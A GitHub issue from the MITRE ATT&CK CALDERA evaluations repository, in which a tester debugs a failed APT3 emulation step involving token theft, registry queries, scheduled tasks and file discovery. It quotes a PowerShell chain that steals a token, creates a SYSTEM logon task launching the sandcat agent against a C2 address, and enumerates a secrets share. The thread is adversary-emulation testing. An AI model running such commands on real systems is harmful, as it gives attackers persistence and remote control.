### ISSUE TITLE
[Plugin - Phase 16 ]  5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083)

### ISSUE THREAD

**Issue by Cyb3rWard0g** [mitre-attack/evals_caldera#4]
Good evening,

this issue goes along with:

* https://github.com/mitre-attack/evals_caldera/issues/1
* https://github.com/mitre-attack/evals_caldera/issues/2
* https://github.com/mitre-attack/evals_caldera/issues/3

because they are from the same setup and operation execution (APT3 - Full)

When I got to 5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083) I got the following message:

```
Import-Module .\StealToken.ps1 -Verbose -Force;StealToken;CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\\\FILE001\secrets\hklm\system\currentcontrolset\control\terminal server"';CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe http://172.18.39.8:8888 evals" /sc ONLOGON /RU SYSTEM';CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b \\FILE001\secrets';CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%';RevertToSelf;
Payload(s) not available: sandcat.exe
```
I was a little confused with the "sandcat.exe" binary. It is in C:\users\public\sandcat.exe as shown below:

![image](https://user-images.githubusercontent.com/9653181/66887693-caa78b00-efa9-11e9-92d2-33e65f7ade63.png)

and this is because when I ran the PowerShell command, it downloaded it there: 

![image](https://user-images.githubusercontent.com/9653181/66887714-de52f180-efa9-11e9-853e-256fe5dde097.png)

However, I believe the script believes it is on the path where the session is running from? Maybe?. However, as you can see below, I ran the powershell script from the users pgustavo default path. I dont know if this makes sense? 😆 

![image](https://user-images.githubusercontent.com/9653181/66887738-fa569300-efa9-11e9-896c-24551052b013.png)

Does it make sense to update the script and set it to point to C:\users\public\sandcat.exe since it is the default location for when it is downloaded? or I can just download the payload and run it from wherever I want?  You guys have this in the WIki `Step 1 began with a legitimate user executing the payload on the victim host.`. I believe that maybe an additional comment can be added to the WIKI to be very specific on why you need to download it rather than using the other options available in Caldera for initial access? Maybe?. Just sharing some thoughts and my initial test 👍 . I am so happy the other other steps worked perfectly fine and I was able to collect the data generated by each step 😉 . 

Thank you in advance!

**Comment by jondricek** [comment]
Admin note: closing all remaining issues and pull requests prior to archiving the repository
